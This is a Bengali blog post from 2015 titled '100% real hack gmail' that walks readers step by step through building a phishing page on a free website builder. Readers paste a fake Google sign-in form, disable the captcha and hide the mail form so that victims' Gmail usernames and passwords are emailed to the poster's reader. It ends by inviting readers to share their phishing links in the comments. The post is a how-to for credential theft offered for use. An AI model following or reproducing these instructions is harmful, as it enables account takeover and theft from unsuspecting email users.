Time is money

Sunday, July 5, 2015

100% real hack gmail.z5



প্রথমে এখান থেকে 

একটা অ্যাকাউন্ট করে নিন।

মানে সাইন আপ করুন। সাইন আপ করা হলে আপনার

ইমেলে গিয়ে ভেরিফাই করে নিন। তার পর Create New

Site থেকে আপনার পছন্দ মত নাম দিয়ে একটি সাইট খুলুন।

সাইট তৈরি হলে নিচের কাজ গুলো মন দিয়ে পগুন আর

সেই মতাবেক কাজ করুন..

প্রথমে আপনি আপনি যে সাইট বানালেন সেই সাইটে

যান এবং এডমিন মোড এ প্রবেশ করুন, এবং এর পর edit site

এ ক্লিক করুন।

এখান থেকে Mail Form এ ক্লিক করুন।

Mail form এ ক্লিক করার পর নিচের মত দেখতে পাবেন


এবার এখান থেকে Enable captcha picture টা Unmark

করে দেন, এবং নিচ থেকে submit এ চাপ দিন। এখন

Homepage এ গেলে আমদের mail form

টা দেখতে পাবেন, এখন আমাদের এই mail form

টা থেকে একটা value কালেক্ট করতে হবে।

চলুন কিভাবে value collect করবেন সেটা দেখাচ্ছি,

এখন এই এখানে যান 

একটা Box দেখতে পাবেন সেই খানে লেখা আছে

itpagla.com

itpagla.com মুছে আপনার ফিশিং সাইট এর লিঙ্ক টা

লিখুন

Http:// সহ লিখবেন।

একটু আপেক্ষা করুন বড় একটা Box আসবে সেই Box এক

অনেক কোড

থাকবে সেথান থেকে P- Value না নোট করে নিন.

P- Value টা নিচের মত আসবে।


চলুন আমরা এডমিন মুড এ আমদের সাইটে আবার

ফিরে যাই। এবার আবারো নিচ থেকে edit site এ

ক্লিক করুন এবং এখান থেকে wml/xhtml code এ ক্লিক করুন

এবার wml/xhtml code: বক্স এ নিচের এই কোড গুলো পেস্ট

করুন।

document.title = "Sign in";

Google

Sign in

Username

Password

Stay signed in



Create an account

© 2014 Google | Terms of Service

| Privacy Policy

| Help

কোডটি কপি করতে প্রবলেম হলে এখান থেকে  কপি করেনিন।

এই কোড গুলোর মধ্যে value=”XXXXXX”

দেখতে পাবেন,এখানে এই xxxxxx এর যায় গায়

আমাদের সেই P-Value নাম্বারটি লেখুন।

লেখা হলে আমরা নিচের Submit বাটন এ ক্লিক করব।

ব্যস কাম শেষ!!!!!

এখন আমাদের আরেকটা সমস্য

সেটা হলো, আমাদের সাইট এ ভিজিট করলে mail form

টা দেখা যায়। আমরা এবার এটাকে Hidden করে দিব।

চলুন দেখাই কিভাবে Hidden করবেন, Edit site এ ক্লিক

করে User এ ক্লিক করুন এবার এখান থেকে Item Visibility

তে ক্লিক করুন। এখানে আমরা আমাদের ওয়েবসাইট এর

সব গুলো Item দেখতে পাবো।

আমরা আমাদের মেইল ফরম এর পাশে A N L X

দেখতে পাবো, আমরা এগুলো থেকে Mail form এর

পাশে থাকা X এ ক্লিক করবো।


(X এ ক্লিক করার মানে হলো এই মেইল ফরম টা সাধারণ

কেউ আর দেখতে পাবেনা, এটা শুধু এডমিন মুড এ

দেখা যাবে)

ব্যস আমাদের কাজ শেষ, আমাদের ফশিং সাইট তৈরি

হাত ব্যথা হয়ে গেলঅবশ্যাই Like টিউমেন্ট করে মতামত

যানাবেন।।

ও টিউমেন্ট এ আপনাদের Fishing site এর Link শেয়ার করবেন

কারটা কেমন হল!!।

মনে রাকবেন কেও Email pass দিয়ে Login করলে তার

Email pass আপনার Email a চলে আসবে।

No comments: